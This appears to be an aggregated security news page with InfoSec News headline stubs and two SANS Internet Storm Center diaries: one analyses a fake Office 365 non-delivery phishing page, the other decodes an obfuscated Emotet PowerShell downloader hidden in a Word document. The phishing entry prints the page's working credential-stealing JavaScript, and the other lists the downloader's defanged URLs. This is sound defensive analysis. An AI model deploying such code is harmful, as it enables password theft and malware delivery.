FreeBSD Network File System Multiple Security Vulnerabilities
 
QEMU CVE-2018-16867 Directory Traversal Vulnerability
 

Posted by InfoSec News on Dec 13

https://www.businessinsider.com/bloomberg-reporters-compensation-2013-12

By Julia La Roche
Business Insider
Dec. 11, 2013

Bloomberg News has an unusual practice of paying some of its reporters
explicitly for publishing "market-moving" stories.

This is one of many metrics that is factored into reporters' annual
bonuses.

This practice is not widespread in the financial news industry, and
journalists we spoke to from other...
 

Posted by InfoSec News on Dec 13

https://www.zdnet.com/article/ships-infected-with-ransomware-usb-malware-worms/

By Catalin Cimpanu
Zero Day
ZDNet News
December 12, 2018

Ships suffer from the same types of cyber-security issues as other IT
systems, a recent document released by the international shipping industry
reveals.

The document is the third edition of the "Guidelines on Cyber Security
onboard Ships," an industry-approved guide put together by a...
 

Posted by InfoSec News on Dec 13

https://fas.org/blogs/secrecy/2018/12/dni-reciprocity/

By Steven Aftergood
Secrecy News
Federation of American Scientists
Dec.12, 2018

One of the most vexatious aspects of the system of granting security
clearances for access to classified information has been the reluctance of
some government agencies to recognize the validity of clearances approved
by other agencies, and to require new investigations and adjudications of
previously...
 

Posted by InfoSec News on Dec 13

https://www.washingtonpost.com/opinions/2018/12/12/washington-must-wake-up-abuse-software-that-kills/

By Josh Rogin
Columnist
The Washington Post
December 12, 2018

Dictators are using spyware to persecute dissidents and journalists at an
alarming rate, while the foreign firms that sell these tools assure the
public that everything is just fine. It's time Washington policymakers and
lawmakers rein in the proliferation and abuse of...
 

Posted by InfoSec News on Dec 13

https://www.cnbc.com/2018/12/12/freelance-hackers-get-paid-to-test-the-defenses-of-firms-like-tesla.html

By Kate Fazzini
CNBC.com
12 Dec 2018

Freelance elite hackers can make more than $500,000 a year searching for
security flaws and reporting those issues at big companies like Tesla and
organizations like the Department of Defense, according to new data
released by ethical hacking platform Bugcrowd.

The company, founded in 2012, is one of...
 

Here is a nice example of phishing attack that I found while reviewing data captured by my honeypots. We all know that phishing is a pain and attackers are always searching for new tactics to entice the potential victim to click on a link, disclose personal information or more…

This time, the email mimicks a fake NDR (“Non Delivery Receipt”) from Microsoft Office 365. Here is an official one (just grabbed as is from Google image):


You probably already received this kind of notification. Office 365 being very popular, chances are increasing daily. Now, let’s have a look at the fake one:

Note also the interesting sender email address, this inspires extra trust isn’t it?

If you click on the link to resend the mail, guess what? The bad guy asks you to enter the password related to the email address passed as argument in the URL:

Here is the piece of code called when you submit the form:

function sendmails() {
  var em = $('#testx').val();
  var ps = $('#pass').val();
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var response = JSON.parse(this.responseText);
      if (response.msg == "donesend") {
        $(".login_form").hide();
        $(".thanks").show(); setTimeout("window.location.href='https://outlook.office365.com/owa/?realm';",5000);
      } else {
        $("#warning").empty();
        $('#warning').append('Your email or password is incorrect. If you don\'t remember your password,<a href="#"> reset it now.<a/>');
      }
    }
  };
  xhttp.open("GET", "sendx.php?user=" + em + "&pass=" +ps, true);
  xhttp.send();
}

It is based on XMLHttpRequest[1] which allows the browser to make a query to another page without reloading the first one. Depending on the results of sendx.php, you get a warning message or a redirect to the official Outlook homepage. My guess is that the PHP code tries to validate the credentials against a Microsoft service.

[1] https://www.w3schools.com/xml/xml_http.asp

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Reader Vince asked for help with the analysis of a malicious Word document. He started the analysis himself, following the method I illustrated in diary entry "Word maldoc: yet another place to hide a command".
Following this method, Vince found a shell statement:

And then searched for string zOSpqpzMSfs, but couldn't find the PowerShell command.

In the diary entry followed by Vince, I search for a VBA string, that is a string delimited with double quotes: "j9tmrnmi". Because this VBA string is used to identify an object that we can find in the streams of the OLE file.
String zOSpqpzMSfs, what Vince is searching, is actually a VBA variable name, and not a VBA string. The value of this variable is calculated at run time, and is not explicitly stored as an object property:

That is why the method followed by Vince does not work for this sample. You need to find the value of the variable, for example by reverse engineering the VBA statements and then calculate the value accordingly.

But there is also a "quick-and-dirty" method that I illustrated in diary entry "Quickie: String Analysis is Still Useful": just search for long strings (printable character sequences) in the document file, regardless of the internal file structure.
This works for Vince's sample (here I'm grepping cmd to keep the output short):


What we have here, is a PowerShell command obfuscated with a DOSfuscation technique.

This command-line statement selects characters from the string in red using indices in yellow:

to build the following command:

I used Python to do the indexing and concatenation to decode the PowerShell command:


And this PowerShell command is a downloader: a command that downloads and executes a malicious executable.

Notice that this downloader tries 5 URLs:

wpthemes[.]com
tom-steed[.]com
bobvr[.]com
alexzstroy[.]ru
herbliebermancommunityleadershipaward[.]org

to download an Emotet variant.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Internet Storm Center Infocon Status